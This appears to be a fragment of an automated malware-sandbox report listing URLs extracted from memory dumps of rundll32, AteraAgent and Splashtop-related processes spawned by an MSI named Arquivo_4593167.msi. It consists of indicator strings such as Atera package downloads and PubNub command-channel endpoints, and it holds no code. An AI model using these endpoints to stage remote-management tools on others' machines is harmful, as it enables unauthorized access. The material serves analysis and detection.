                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9BF8000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1248000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284391960.0000020ABA010000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284530443.0000020ABA070000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2282825260.0000020AB9D10000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA159A000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA298000.00000004.00000020.00020000.00000000.sdmp, PreVerCheck.exe, 00000025.00000002.2562182711.0000000000BF5000.00000002.00000001.01000000.0000001C.sdmp, Arquivo_4593167.msi, SRUsb.exe.1.dr, Microsoft.Win32.TaskScheduler.dll0.24.dr, System.Runtime.Serialization.Json.dll.24.dr, libssl-3.dll.1.dr, System.Diagnostics.Process.dll.24.dr, Microsoft.Extensions.FileSystemGlobbing.dll.24.dr, System.Runtime.InteropServices.dll.24.dr, System.Text.Encodings.Web.dll0.24.drString found in binary or memory: http://ocsp.digicert.com0C
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp, Arquivo_4593167.msiString found in binary or memory: http://ocsp.digicert.com0K
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp, Arquivo_4593167.msiString found in binary or memory: http://ocsp.digicert.com0N
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp, Arquivo_4593167.msiString found in binary or memory: http://ocsp.digicert.com0O
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1790492966.000001C5E58A0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9B88000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9BF8000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1248000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284391960.0000020ABA010000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284530443.0000020ABA070000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA159A000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2976304470.0000016BEA309000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2978322929.0000016BEA6F6000.00000004.00000020.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2648816776.000002171A139000.00000004.00000800.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2648816776.000002171A0B9000.00000004.00000800.00020000.00000000.sdmp, PreVerCheck.exe, 00000025.00000002.2562182711.0000000000BF5000.00000002.00000001.01000000.0000001C.sdmp, Arquivo_4593167.msi, SRUsb.exe.1.dr, Microsoft.Win32.TaskScheduler.dll0.24.dr, System.Runtime.Serialization.Json.dll.24.dr, libssl-3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0X
                                Source: AteraAgent.exe, 00000018.00000002.2978322929.0000016BEA6E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com1.3.6.1.5.5.7.48.2http://cacerts.digicert.com/DigiCertTrustedG4CodeSigning
                                Source: AteraAgent.exe, 0000000C.00000002.1793099468.000001C5E5C6E000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9B60000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA269000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2978322929.0000016BEA6E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com1.3.6.1.5.5.7.48.2http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRS
                                Source: AteraAgent.exe, 00000018.00000002.2978250326.0000016BEA6DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com1.3.6.1.5.5.7.48.2http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
                                Source: AteraAgent.exe, 0000000C.00000002.1790492966.000001C5E5955000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9B20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com:80/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSRXerF0eFeSWRripTgTkcJWMm7iQQUaDfg67Y7%2BF
                                Source: AteraAgent.exe, 0000000C.00000002.1790492966.000001C5E5904000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertAssuredIDRootCA.crl
                                Source: AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9B76000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2972325371.0000016BE9E4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.cr
                                Source: AteraAgent.exe, 0000000D.00000002.2279102001.0000020AB97D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedRootG4.crl
                                Source: AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA269000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedRootG4.crlV
                                Source: xdnup.dll.1.dr, stdpms.cat.1.drString found in binary or memory: http://ocsp.thawte.com0
                                Source: AteraAgent.exe, 0000000D.00000002.2282825260.0000020AB9CC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pki.digidentity.eu/validatie0
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA13CF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA14F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ps.atera.com
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1592000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA13CF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1349000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1CC3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1D78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ps.pndsn.com
                                Source: AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9B88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/0
                                Source: xdnup.dll.1.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                                Source: xdnup.dll.1.drString found in binary or memory: http://s2.symcb.com0
                                Source: AteraAgent.exe, 0000000C.00000002.1789701258.000001C5CD199000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org
                                Source: AteraAgent.exe, 0000000C.00000002.1789701258.000001C5CD199000.00000004.00000800.00020000.00000000.sdmp, System.Private.DataContractSerialization.dll.1.drString found in binary or memory: http://schemas.datacontract.org/2004/07/
                                Source: System.Private.DataContractSerialization.dll.1.drString found in binary or memory: http://schemas.datacontract.org/2004/07/System.Collections.GenericJ
                                Source: System.Private.DataContractSerialization.dll.1.drString found in binary or memory: http://schemas.datacontract.org/2004/07/System.IO
                                Source: System.Private.DataContractSerialization.dll.1.drString found in binary or memory: http://schemas.datacontract.org/2004/07/System.Runtime.Serialization
                                Source: AteraAgent.exe, 0000000C.00000002.1789701258.000001C5CD199000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.ServiceProcess
                                Source: System.Private.DataContractSerialization.dll.1.drString found in binary or memory: http://schemas.datacontract.org/2004/07/System.Xml
                                Source: System.Private.DataContractSerialization.dll.1.drString found in binary or memory: http://schemas.datacontract.org/2004/07/SystemV
                                Source: System.Private.DataContractSerialization.dll.1.drString found in binary or memory: http://schemas.datacontract.org/2004/07/SystemY
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1168000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageTaskScheduler/13.0/AgentPackageTaskScheduler.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1224000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/Agent.Package.Availability/0.16/Agent.Package.Availability.z
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1224000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1168000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/Agent.Package.IotPoc/0.2/Agent.Package.IotPoc.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1224000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10B0000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/Agent.Package.Watchdog/1.7/Agent.Package.Watchdog.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1224000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageADRemote/6.0/AgentPackageADRemote.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1380000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageAgentInformation/37.9/AgentPackageAgentInformati
                                Source: AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageHeartbeat/17.14/AgentPackageHeartbeat.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1224000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageHeartbeat/17.14/AgentPackageHeartbeat.zipp
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1224000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageInternalPoller/23.8/AgentPackageInternalPoller.z
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1224000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageMarketplace/1.6/AgentPackageMarketplace.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA14F3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageMonitoring/37.8/AgentPackageMonitoring.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA14F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageMonitoring/37.8/AgentPackageMonitoring.zip?KKgGC
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA14D5000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA14F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageMonitoring/37.8/AgentPackageMonitoring.ziph
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1224000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1168000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageNetworkDiscovery/23.9/AgentPackageNetworkDiscove
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1224000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageOsUpdates/20.0/AgentPackageOsUpdates.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1224000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageProgramManagement/25.8/AgentPackageProgramManage
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1224000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1168000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10B0000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageRuntimeInstaller/1.6/AgentPackageRuntimeInstalle
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1349000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10C4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1380000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageSTRemote/23.4/AgentPackageSTRemote.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA13CF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageSTRemote/23.4/AgentPackageSTRemote.zip?KKgGC7fCc
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA13CF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageSTRemote/23.4/AgentPackageSTRemote.ziph
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1224000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageSystemTools/27.6/AgentPackageSystemTools.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1224000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1168000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageTaskScheduler/17.2/AgentPackageTaskScheduler.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1224000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageTicketing/29.9/AgentPackageTicketing.zip
                                Source: AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageTicketing/29.9/AgentPackageTicketing.zip?KKgGC7f
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1224000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageUpgradeAgent/27.2/AgentPackageUpgradeAgent.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1224000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1168000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageWindowsUpdate/24.6/AgentPackageWindowsUpdate.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/Agent.Package.Availability/13.0/Agent.Package.Availability.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1168000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/Agent.Package.IotPoc/13.0/Agent.Package.IotPoc.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/Agent.Package.Watchdog/13.0/Agent.Package.Watchdog.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageAgentInformation/22.7/AgentPackageAgentInformation
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA14F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageMonitoring/22.0/AgentPackageMonitoring.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1168000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageNetworkDiscovery/15.0/AgentPackageNetworkDiscovery
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1168000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageRuntimeInstaller/13.0/AgentPackageRuntimeInstaller
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageSTRemote/16.0/AgentPackageSTRemote.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1168000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageTaskScheduler/13.1/AgentPackageTaskScheduler.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2284391960.0000020ABA010000.00000004.00000020.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000000.2010019478.0000021719512000.00000002.00000001.01000000.0000001A.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2648816776.0000021719FB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/installers/splashtop/win/SplashtopStreamer.exe
                                Source: AteraAgent.exe, 0000000D.00000002.2284391960.0000020ABA010000.00000004.00000020.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000000.2010019478.0000021719512000.00000002.00000001.01000000.0000001A.sdmpString found in binary or memory: https://ps.atera.com/installers/splashtop/win/SplashtopStreamer.exepUsers/Shared/Splashtop
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1592000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA13CF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1349000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA159A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1467000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1D0E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1D98000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1592000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA13CF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1349000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10D4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1068000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA159A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1467000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1D0E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1CC3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD161C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1C7A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1D98000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1D02000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1D78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=00370d56-8b21-43a9-8b87-a8ec77571e56
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=0efe0bbf-2a0e-40d8-965f-19f51f0fd321
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1592000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=2bfbcf15-78c5-42b3-a888-e57cf083e16d
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA13CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=737ec693-90a8-4422-9ac8-a4ec4dd18ff5
                                Source: AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1D0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=abea1582-463a-4a7f-add0-13f90d8f2650
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=b8910c6f-67a0-4f27-ab84-5ffd997cd0c5
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1349000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=d356e0ff-7cf6-451a-abfd-493cb798864d
                                Source: AteraAgent.exe, 00000018.00000002.2940646679.0000016BD161C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=da8a8aee-d717-4843-aaf8-93981205c3dc
                                Source: AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=e67ebcbd-5956-47bb-95bb-73cf0832e6de
                                Source: AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1CFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/v2
                                Source: AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1D78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/v2/presence/sub_key/sub-c-a02ceca8
                                Source: AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1D78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/bc2f6fef
                                Source: AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/v2/subscribe/sub-c-a02ceca8-a958-11e5-b
                                Source: AteraAgent.exe, 00000018.00000002.2940646679.0000016BD161C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1168000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/bc2f6fef-7e04-492a-b3
